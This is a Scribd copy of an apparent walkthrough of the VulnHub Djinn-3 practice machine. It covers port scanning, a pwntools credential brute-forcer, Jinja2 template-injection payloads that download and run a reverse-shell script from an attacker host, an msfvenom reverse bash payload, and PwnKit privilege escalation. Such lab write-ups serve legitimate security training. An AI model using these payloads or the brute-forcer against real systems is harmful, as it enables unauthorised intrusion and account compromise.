Scribd
Upload
101 views8 pages

Vuln Hub

Uploaded by

fatherofallraju
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
101 views8 pages

Vuln Hub

Uploaded by

fatherofallraju
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

VulnHub-Djinn-3

Download

Services enumeration
sudo arp-scan -l

nmap 192.168.233.138

nmap 192.168.233.138 -p 22,80,5000,31337 -sV -sC


22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
Port 80/tcp open http lighttpd 1.4.45

No robots.txt
No comments in page source code
gobuster dir -u http://192.168.233.138/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-
medium.txt -x html,xml,php,js
/images and /%7echeckout%7e 403 - Forbidden

Port 5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.9)

This port hosts a python web server. We see a list of tickets with a number, an ID, a title, a status and
a link

We get some usernames: jack, Jason, David, freddy, guest

gobuster dir -u http://192.168.233.138:5000/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-


2.3-medium.txt -x html,xml,php,js

Port 31337/tcp open Elite?

This port hosts a custom application that we can connect to via netcat. It requires an authentication.
Brute forcing the authentication

#!/usr/bin/env python3

from pwn import *


import sys

host, port = '192.168.233.138', 31337

# https://raw.githubusercontent.com/shipcod3/Piata-Common-Usernames-
and-Passwords/master/userpass.txt

with open('userpass.txt') as f:
data = f.readlines()

for creds in data:


(username, password) = creds.split(' ')
username = username.strip()
password = password.strip()

s = remote(host, port, level='error')

s.recvuntil('username> ')
s.sendline(username)
s.recvuntil('password> ')
s.sendline(password)

msg = s.recvline()
if b'authentication failed' not in msg:
print("[+] Valid credentials found: {}:{}".format(username,
password))
sys.exit(0)

s.close()

create user wordlist


{{config.__class__.__init__.__globals__['os'].popen('wget http://172.16.222.128:8000/revshell.sh -O
/tmp/revshell.sh').read()}}
{{config.__class__.__init__.__globals__['os'].popen('bash /tmp/revshell.sh').read()}}

Hear is a SERVER SIDE TEMPLATE INJECTION (SSTI) vulnerability

Create a unix reverse shell

msfvenom -p cmd/unix/reverse_bash lhost=192.168.233.132 lport=4444 -f raw -o revshell.sh

Create http server to transfer payload to victim

Create netcat listener

Click on new link


We get connection

Use linux exploit suggester

https://github.com/arthepsy/CVE-2021-4034

goto /tmp directory

Download PwnKit

You might also like